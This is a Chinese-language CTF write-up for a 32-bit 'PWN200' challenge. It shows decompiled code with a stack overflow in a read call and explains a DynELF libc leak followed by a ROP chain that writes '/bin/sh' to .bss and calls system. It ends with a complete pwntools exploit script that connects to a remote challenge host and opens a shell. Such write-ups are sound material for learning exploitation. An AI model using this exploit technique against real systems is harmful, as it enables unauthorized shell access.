題目鏈接
PWN200
題目和JarvisOJ level4很像
檢查保護
利用checksec --file pwn200可以看到開啟了NX防護
靜態反編譯結構
Main函數反編譯結果如下
int __cdecl main()
{
int buf; // [esp+2Ch] [ebp-6Ch]
int v2; // [esp+30h] [ebp-68h]
int v3; // [esp+34h] [ebp-64h]
int v4; // [esp+38h] [ebp-60h]
int v5; // [esp+3Ch] [ebp-5Ch]
int v6; // [esp+40h] [ebp-58h]
int v7; // [esp+44h] [ebp-54h]
buf = 1668048215;
v2 = 543518063;
v3 = 1478520692;
v4 = 1179927364;
v5 = 892416050;
v6 = 663934;
memset(&v7, 0, 0x4Cu);
setbuf(stdout, (char *)&buf);
write(1, &buf, strlen((const char *)&buf));
sub_8048484();
return 0;
}
sub_8048484()反編譯如下:
ssize_t sub_8048484()
{
char buf; // [esp+1Ch] [ebp-6Ch]
setbuf(stdin, &buf);
return read(0, &buf, 0x100u); //明顯棧溢出
}
EXP思路
利用DynELF泄露出system地址,通過3pop,ret調用read函數,將'/bin/sh'寫入到bss段中,之后構造ROP鏈system調用bss段中'/bin/sh'達到提權目的。
DynELF方法參考安全客的一篇文章【技術分享】借助DynELF實現無libc的漏洞利用小結
完整EXP
from pwn import *
io = remote('111.198.29.45','39532')
#io = process('./pwn200')
#context.log_level= 'debug'
elf = ELF('./pwn200')
ppp_r = 0x80485cd
read_got = elf.got['read']
read_plt = elf.plt['read']
main_addr = 0x80484be
start_addr = 0x80483d0
write_plt = elf.plt['write']
write_got = elf.got['write']
func_addr = 0x8048484
def leak(address):
payload1 = 'A'*112+p32(write_plt)+p32(func_addr)+p32(1)+p32(address)+p32(4)
io.send(payload1)
data = io.recv(4)
print data
return data
print io.recv()
dyn = DynELF(leak,elf=ELF('./pwn200'))
sys_addr = dyn.lookup('system','libc')
print 'system address: ',hex(sys_addr)
payload = 'a'*112+p32(start_addr)
io.send(payload)
io.recv()
bss_addr =elf.bss()
print 'bss addr: ',hex(bss_addr)
payload = 'a'*112 + p32(read_plt)+p32(ppp_r)+p32(0)+p32(bss_addr)+p32(8)
payload +=p32(sys_addr)+p32(func_addr)+p32(bss_addr)
io.send(payload)
io.send('/bin/sh')
io.interactive()